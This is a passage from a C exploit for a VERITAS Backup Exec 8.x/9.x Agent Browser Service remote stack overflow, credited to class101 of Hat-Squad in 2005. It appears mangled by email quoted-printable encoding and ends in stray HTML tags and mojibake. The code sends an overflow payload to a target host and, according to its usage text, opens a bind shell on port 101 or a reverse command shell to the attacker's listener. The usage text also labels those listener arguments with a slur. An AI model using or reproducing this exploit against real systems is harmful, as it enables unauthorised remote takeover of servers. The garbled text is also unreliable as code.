             unsigned=20
short gport;
             char *os;
             if=20
(argc>6||argc<3||atoi(argv[1])>2||atoi(argv[1])<1){usage(argv=
[0]);return=20
-1;} 
             if (argc=3D=3D5){usage(argv[0]);return=20
-1;} 
                if =
(strlen(argv[2])<7){usage(argv[0]);return=20
-1;} 
                if=20
(argc=3D=3D6)
             {
                    =
if=20
(strlen(argv[4])<7){usage(argv[0]);return =
-1;} 
             }
            #ifndef=20
WIN32
             if=20
(argc=3D=3D6)
             {
               gip=3Dinet_addr(argv[4])^(l=
ong)0x00000000;
              gport=3Dhtons(atoi(argv[5]))^(short)0x0000=
;
             }
            #define=20
Sleep  sleep
            #define SOCKET  int
            #define=20
closesocket(s) close(s)
            #else
             if=20
(WSAStartup(MAKEWORD(2,0),&wsadata)!=3D0){printf("[+] wsastartup=20
error\n");return -1;}
             if=20
(argc=3D=3D6)
             {
              gip=3Dinet_addr(argv[4])^(ULONG)0=
x00000000;
              gport=3Dhtons(atoi(argv[5]))^(USHORT)0x0000; }
            #endif
             int=20
ip=3Dhtonl(inet_addr(argv[2])), port;
             if=20
(argc=3D=3D4||argc=3D=3D6){port=3Datoi(argv[3]);} else =
port=3D6101;
             SOCKET s;fd_set=20
mask;struct timeval timeout; struct sockaddr_in=20
server;
             s=3Dsocket(AF_INET,SOCK_STREAM,0);
             if=20
(s=3D=3D-1){printf("[+] socket() error\n");return -1;} 
             if =

(atoi(argv[1])=3D=3D1) {memcpy(&talk[37], &v91sp0sp1,=20
4);memcpy(&talk[72], &esisp0sp1, 4);os=3D"Backup Exec=20
v9.1.4691.1\n[+]         &nb=
sp; =20
Backup Exec v9.1.4691.0";}
             else {memcpy(&talk[37], =
&v85,=20
4);memcpy(&talk[72], &esiold, 4);os=3D"Backup Exec=20
v8.5.3572";}
             if=20
(argc=3D=3D6)
             {
              memcpy(&scode1[282], =
&gip,=20
4);
              memcpy(&scode1[289], &gport,=20
2);
              strcat(payload,scode1);
             }
             else=20
strcat(payload,scode2);
             printf("[+] target(s):=20
%s\n",os);   
             server.sin_family=3DAF_INET;
            &nb=
sp;server.sin_addr.s_addr=3Dhtonl(ip);
             server.sin_port=3Dhtons(p=
ort);
             connect(s,(=20
struct sockaddr=20
*)&server,sizeof(server));
             timeout.tv_sec=3D3;timeout.tv_use=
c=3D0;FD_ZERO(&mask);FD_SET(s,&mask);
             switch(select(s+1,=
NULL,&mask,NULL,&timeout))
             {
              case=20
-1: {printf("[+] select() error\n");closesocket(s);return=20
-1;}
              case 0: {printf("[+] connect()=20
error\n");closesocket(s);return=20
-1;}
              default:
              if(FD_ISSET(s,&mask))
            =
  {
               printf("[+]=20
connected, constructing the payload...\n");
               if=20
(send(s,talk,sizeof(talk)-1,0)=3D=3D-1) { printf("[+] sending error 1, =
the server=20
prolly rebooted.\n");return -1;}
            

             
            

            #ifdef=20
WIN32
               Sleep(10);
            #else
               Sleep=
(1/100);
            #endif
               if=20
(send(s,payload,strlen(payload),0)=3D=3D-1) { printf("[+] sending error =
2, the=20
server is patched.\n");return -1;}
            

             
            

            #ifdef=20
WIN32
               Sleep(10);
            #else
               Sleep=
(1/100);
            #endif
            

             
            

               if=20
(send(s,payload,strlen(payload),0)=3D=3D-1) { printf("[+] sending error =
3, the=20
server is patched.\n");return -1;}
            

             
            

            #ifdef=20
WIN32
               Sleep(10);
            #else
               Sleep=
(1/100);
            #endif
            

             
            

               if=20
(send(s,payload,strlen(payload),0)=3D=3D-1) { printf("[+] sending error =
4, the=20
server is patched.\n");return -1;}
            

             
            

            #ifdef=20
WIN32
               Sleep(10);
            #else
               Sleep=
(1/100);
            #endif
            

             
            

               if=20
(send(s,payload,strlen(payload),0)=3D=3D-1) { printf("[+] sending error =
5, the=20
server is patched.\n");return -1;}
            

             
            

            #ifdef=20
WIN32
               Sleep(10);
            #else
               Sleep=
(1/100);
            #endif
               if=20
(send(s,payload,strlen(payload),0)=3D=3D-1) { printf("[+] sending error =
6, the=20
server is patched.\n");return -1;}
            

             
            

            #ifdef=20
WIN32
               Sleep(10);
            #else
               Sleep=
(1/100);
            #endif
               if=20
(send(s,payload,strlen(payload),0)=3D=3D-1) { printf("[+] sending error =
7, the=20
server is patched.\n");return -1;}
            

             
            

            #ifdef=20
WIN32
               Sleep(10);
            #else
               Sleep=
(1/100);
            #endif
               if=20
(send(s,payload,strlen(payload),0)=3D=3D-1) { printf("[+] sending error =
8, the=20
server is patched.\n");return -1;}
            #ifdef=20
WIN32
               Sleep(1000);
            #else
               Sle=
ep(1);
            #endif   
               printf("[+]=20
size of payload:=20
%d\n",(sizeof(talk)-1)+strlen(payload)*7);   
             &nb=
sp; printf("[+]=20
payload sent.\n");
               return=20
0;
              }
             }
             closesocket(s);
            #ifdef=20
WIN32
             WSACleanup();
            #endif
             return =
0;
            }
            

             
            


            void usage(char* us) 
            { =20

             printf("USAGE:\n");
             printf("    &n=
bsp;=20
[+]  . 101_BXEC.exe Version=20
VulnIP\n");
             printf("      [+]  .=20
101_BXEC.exe Version VulnIP=20
VulnPORT\n");
             printf("      [+]  =
.=20
101_BXEC.exe Version VulnIP VulnPORT GayIP=20
GayPORT\n");
             printf("VERSION:      =
;            =
             =

\n");
             printf("      [+] 1. Backup Exec =

v9.1.4691.SP1\n");
             printf("      [+] =
1. Backup=20
Exec v9.1.4691.SP0\n");
             printf("      =
[+] 2.=20
Backup Exec=20
v8.5.3572\n");
             printf("TARGET:     &nbs=
p;            =
;            =
=20
\n");
             printf("      [+]  . =
2k3/2k/XP/NT4=20
universal=20
(*)\n");
             printf("NOTE:       =
            &=
nbsp;          =20
\n");
             printf("      The exploit bind a =

cmdshell port 101 =
or\n");
             printf("     =20
reverse a cmdshell on your=20
listener.\n");
             printf("      A =
wildcard (*)=20
mean tested =
working.\n");
             printf("     =20
Compilation msvc6, cygwin, Linux.\n");
             return;
            } 
            void=20
ver()

             printf("      &nb=
sp;           &nbs=
p;            =
;            =
            &=
nbsp;          =20
\n");
             printf("       =20
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D[0.4=
]=3D=3D=3D=3D=3D=3D=3D=3D\n");
             printf("    &=
nbsp;  =20
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3DVERITAS Backup Exec =
8.x/9.x=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\n");=20

             printf("        =
=3D=3D=3D=3D=3D=3D=3D=3D=3DAgent=20
Browser Service, Remote Stack=20
Overflow=3D=3D=3D=3D=3D=3D=3D=3D\n");
             printf("   =
    =20
=3D=3D=3D=3D=3D=3Dcoded by =
class101=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D[Hat-Squad.com=20
2005]=3D=3D=3D=3D=3D\n");
             printf("     =
  =20
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\n");
             printf("   =
;            =
            &=
nbsp;           &n=
bsp;           &nb=
sp;           &nbs=
p;  =20
\n");
            }
            

            -------------------------------------------------------------class101
            Hat-Squad.com
            -------------------------------------------=
------------------
            

            <span id="7ztzv"></span>
            <sub id="7ztzv"></sub>
            

            <span id="7ztzv"></span><form id="7ztzv"></form>
            

            <span id="7ztzv"></span>
              

                

                  <address id="7ztzv"></address>
                      

ÑÇÖÞÅ·ÃÀÔÚÏß



------=_NextPart_000_003D_01C4F7DA.972C2380--